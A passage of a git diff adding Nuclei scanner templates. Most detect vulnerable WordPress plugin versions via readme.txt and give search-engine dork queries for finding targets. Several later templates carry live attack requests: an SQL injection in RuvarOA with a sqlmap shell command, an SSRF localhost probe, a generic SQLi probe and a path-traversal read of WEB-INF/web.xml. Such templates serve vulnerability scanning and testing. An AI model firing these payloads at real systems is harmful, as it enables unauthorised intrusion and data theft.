above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c600b4-10d6-4b0b-9ca0-7c629d383d33?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-49264 + metadata: + fofa-query: "wp-content/plugins/events-addon-for-elementor/" + google-query: inurl:"/wp-content/plugins/events-addon-for-elementor/" + shodan-query: 'vuln:CVE-2024-49264' + tags: cve,wordpress,wp-plugin,events-addon-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/events-addon-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "events-addon-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9.yaml b/poc/cve/CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9.yaml new file mode 100644 index 0000000000..17045f8808 --- /dev/null +++ b/poc/cve/CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9 + +info: + name: > + WP Content Copy Protection & No Right Click <= 3.5.9 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The WP Content Copy Protection & No Right Click plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.9. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f9f273ed-2ffd-4632-9886-244c0d55ede5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-49306 + metadata: + fofa-query: "wp-content/plugins/wp-content-copy-protector/" + google-query: inurl:"/wp-content/plugins/wp-content-copy-protector/" + shodan-query: 'vuln:CVE-2024-49306' + tags: cve,wordpress,wp-plugin,wp-content-copy-protector,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-content-copy-protector/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-content-copy-protector" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31.yaml b/poc/cve/CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31.yaml new file mode 100644 index 0000000000..bc3196f328 --- /dev/null +++ b/poc/cve/CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31 + +info: + name: > + Themesflat Addons For Elementor <= 2.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/835aaf5e-08c8-4bf8-add7-82a1f1fdc2c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-49310 + metadata: + fofa-query: "wp-content/plugins/themesflat-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/themesflat-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-49310' + tags: cve,wordpress,wp-plugin,themesflat-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themesflat-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themesflat-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8515-4fab457421fd53fdaacbeb1402844959.yaml b/poc/cve/CVE-2024-8515-4fab457421fd53fdaacbeb1402844959.yaml new file mode 100644 index 0000000000..d7a88b4236 --- /dev/null +++ b/poc/cve/CVE-2024-8515-4fab457421fd53fdaacbeb1402844959.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8515-4fab457421fd53fdaacbeb1402844959 + +info: + name: > + Themesflat Addons For Elementor <= 2.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets like 'TF E Slider Widget', 'TF Video Widget', 'TF Team Widget' and more in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on URL attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1603c61b-11a3-41e5-b339-a9411b02f383?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8515 + metadata: + fofa-query: "wp-content/plugins/themesflat-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/themesflat-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-8515' + tags: cve,wordpress,wp-plugin,themesflat-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themesflat-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themesflat-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e.yaml b/poc/cve/CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e.yaml new file mode 100644 index 0000000000..f7cb69b4af --- /dev/null +++ b/poc/cve/CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e + +info: + name: > + Themesflat Addons For Elementor <= 2.2.1 - Authenticated (Contributor+) Information Exposure + author: topscoder + severity: low + description: > + The Themesflat Addons For Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.1 via the render() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract limited post information from draft and future scheduled posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/75c5d4e6-9ef3-4b12-9ee9-67121dbb0fcd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8516 + metadata: + fofa-query: "wp-content/plugins/themesflat-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/themesflat-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-8516' + tags: cve,wordpress,wp-plugin,themesflat-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themesflat-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themesflat-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1.yaml b/poc/cve/CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1.yaml new file mode 100644 index 0000000000..6b98a650c3 --- /dev/null +++ b/poc/cve/CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1 + +info: + name: > + All-in-One WP Migration and Backup <= 7.86 - Unauthenticated Information Disclosure via Error Logs + author: topscoder + severity: medium + description: > + The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.86 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information such as full paths contained in the exposed log files. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c4901d9d-7b37-40d5-a42b-59c80bbbe8ff?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-8852 + metadata: + fofa-query: "wp-content/plugins/all-in-one-wp-migration/" + google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/" + shodan-query: 'vuln:CVE-2024-8852' + tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-in-one-wp-migration" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.86') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml b/poc/cve/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml new file mode 100644 index 0000000000..d6d9e2d977 --- /dev/null +++ b/poc/cve/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9231-db808094493fa9c79c27a8695747553b + +info: + name: > + WP-Members Membership Plugin <= 3.4.9.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WP-Members Membership Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.9.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d59e599-59da-4c03-b71f-d00a078b2442?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9231 + metadata: + fofa-query: "wp-content/plugins/wp-members/" + google-query: inurl:"/wp-content/plugins/wp-members/" + shodan-query: 'vuln:CVE-2024-9231' + tags: cve,wordpress,wp-plugin,wp-members,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-members/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-members" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.9.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5.yaml b/poc/cve/CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5.yaml new file mode 100644 index 0000000000..7fb30697c4 --- /dev/null +++ b/poc/cve/CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5 + +info: + name: > + News Kit Elementor Addons <= 1.2.1 - Authenticated (Contributor+) Sensitive Information Exposure via Canvas Menu Elementor Template + author: topscoder + severity: low + description: > + The News Kit Elementor Addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the render function in includes/widgets/canvas-menu/canvas-menu.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffc5408c-ca31-4cb6-8cb5-063acbbad01e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-9541 + metadata: + fofa-query: "wp-content/plugins/news-kit-elementor-addons/" + google-query: inurl:"/wp-content/plugins/news-kit-elementor-addons/" + shodan-query: 'vuln:CVE-2024-9541' + tags: cve,wordpress,wp-plugin,news-kit-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/news-kit-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "news-kit-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc.yaml b/poc/cve/CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc.yaml new file mode 100644 index 0000000000..8b5a4a85aa --- /dev/null +++ b/poc/cve/CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Cross-Site Request Forgery to Taxonomy Meta Add/Delete + author: topscoder + severity: medium + description: > + The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the 'wpaft_option_page' function. This makes it possible for unauthenticated attackers to add and delete taxonomy meta, granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-9588 + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:CVE-2024-9588' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040.yaml b/poc/cve/CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040.yaml new file mode 100644 index 0000000000..0ef5480d2d --- /dev/null +++ b/poc/cve/CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040 + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'new_meta_name' parameter in the 'wpaft_option_page' function in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with administrator-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9d879fc6-97ec-4ecb-99c8-7fc0b91692ef?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-9589 + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:CVE-2024-9589' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9590-d335833612c12a3934657fc9b0690fce.yaml b/poc/cve/CVE-2024-9590-d335833612c12a3934657fc9b0690fce.yaml new file mode 100644 index 0000000000..e1ce5c4427 --- /dev/null +++ b/poc/cve/CVE-2024-9590-d335833612c12a3934657fc9b0690fce.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9590-d335833612c12a3934657fc9b0690fce + +info: + name: > + Category and Taxonomy Meta Fields <= 1.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image meta field value in the 'wpaft_add_meta_textinput' function in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3f6d9c23-53e9-4393-beff-2f996c279ad8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-9590 + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-meta/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-meta/" + shodan-query: 'vuln:CVE-2024-9590' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-meta,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-meta/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-meta" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9591-26f35871fb392b482473e0ce75b175fb.yaml b/poc/cve/CVE-2024-9591-26f35871fb392b482473e0ce75b175fb.yaml new file mode 100644 index 0000000000..9d313d6b24 --- /dev/null +++ b/poc/cve/CVE-2024-9591-26f35871fb392b482473e0ce75b175fb.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9591-26f35871fb392b482473e0ce75b175fb + +info: + name: > + Category and Taxonomy Image <= 1.0.0 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Category and Taxonomy Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_category_image' parameter in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with editor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5760933b-30e6-465b-9b94-c913b21f07fd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-9591 + metadata: + fofa-query: "wp-content/plugins/wp-custom-taxonomy-image/" + google-query: inurl:"/wp-content/plugins/wp-custom-taxonomy-image/" + shodan-query: 'vuln:CVE-2024-9591' + tags: cve,wordpress,wp-plugin,wp-custom-taxonomy-image,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-taxonomy-image/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-custom-taxonomy-image" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47.yaml b/poc/cve/CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47.yaml new file mode 100644 index 0000000000..5d961f0e32 --- /dev/null +++ b/poc/cve/CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47 + +info: + name: > + TeploBot - Telegram Bot for WP <= 1.3 - Telegram Bot Token Disclosure + author: topscoder + severity: high + description: > + The TeploBot - Telegram Bot for WP plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'service_process' function in all versions up to, and including, 1.3. This makes it possible for unauthenticated attackers to view the Telegram Bot Token, which is a secret token to control the bot. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/091dadcb-71ac-4321-b3aa-72b5fbbd9163?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cve-id: CVE-2024-9627 + metadata: + fofa-query: "wp-content/plugins/green-wp-telegram-bot-by-teplitsa/" + google-query: inurl:"/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/" + shodan-query: 'vuln:CVE-2024-9627' + tags: cve,wordpress,wp-plugin,green-wp-telegram-bot-by-teplitsa,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/green-wp-telegram-bot-by-teplitsa/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "green-wp-telegram-bot-by-teplitsa" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/injection/injection.yaml b/poc/injection/injection.yaml new file mode 100644 index 0000000000..0dabf5d877 --- /dev/null +++ b/poc/injection/injection.yaml @@ -0,0 +1,20 @@ +id: injection +info: + name: Injection (SQL Injection) + author: Ali Baykara + severity: high + description: | + Detects potential SQL injection vulnerabilities by injecting a faulty SQL query into the URL. + tags: owasp, injection, sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/search?query=test'" + matchers: + - type: word + words: + - "syntax error" + - type: status + status: + - 500 diff --git a/poc/other/Server-Side-Request-Forgery.yaml b/poc/other/Server-Side-Request-Forgery.yaml new file mode 100644 index 0000000000..9f79a849a5 --- /dev/null +++ b/poc/other/Server-Side-Request-Forgery.yaml @@ -0,0 +1,18 @@ +id: ssrf +info: + name: Server-Side Request Forgery (SSRF) + author: Ali Baykara + severity: critical + description: | + Attempts to exploit SSRF by sending a request to localhost. + tags: owasp, ssrf + +requests: + - method: POST + path: + - "{{BaseURL}}/api/v1/fetch" + body: '{"url":"http://127.0.0.1:80"}' + matchers: + - type: status + status: + - 200 diff --git a/poc/other/TVE-2024-105272140.yaml b/poc/other/TVE-2024-105272140.yaml new file mode 100644 index 0000000000..be4c10dfd3 --- /dev/null +++ b/poc/other/TVE-2024-105272140.yaml @@ -0,0 +1,42 @@ +id: 2024-105272120 + +info: + name: RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞 + author: k3ppf0r + severity: high + description: | + RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + reference: + - https://blog.csdn.net/qq_41904294/article/details/138723401 + remediation: | + 升级RuvarOA到高版本 + classification: + cve-id: 2024-105272120 + cvss-score: 7.8 + cwe-id: CWE-89 + metadata: + date: 2024-05-11 + version: RuvarOA V6.01 、RuvarOA V12.01 + fofa-query: body="txt_admin_key" + tags: sqli,RuvarOA,leak + +# python sqlmap.py -u "http://xxxx?id=1*" --sql-shell + + +http: + - raw: + - | + @timeout: 10s + GET /WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33 + Connection: close + + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + condition: and + diff --git a/poc/other/XVE-2024-2116.yaml b/poc/other/XVE-2024-2116.yaml new file mode 100644 index 0000000000..b4909b2672 --- /dev/null +++ b/poc/other/XVE-2024-2116.yaml @@ -0,0 +1,40 @@ +id: local-file-include + +info: + name: local-file-include + author: k3ppf0r + severity: high + description: | + 该产品存在任意文件读取漏洞,未经身份验证攻击者可以利用漏洞读取服务器上的任意文件,包括配置文件等敏感信息。 + reference: + - + remediation: | + 打对应补丁,重启服务 + classification: + cve-id: + cvss-score: 7.5 + cwe-id: CWE-552 + metadata: + date: + version: + fofa-query: + tags: lfi,leak,path + + +http: + - raw: + - | + GET /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Accept-Encoding: gzip, deflate, br + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + matchers: + - type: dsl + dsl: + - 'contains(body,"xml version")' + - status_code == 200 + condition: and \ No newline at end of file diff --git a/poc/other/anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf.yaml b/poc/other/anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf.yaml new file mode 100644 index 0000000000..ac00356aef --- /dev/null +++ b/poc/other/anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf.yaml @@ -0,0 +1,59 @@ +id: anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf 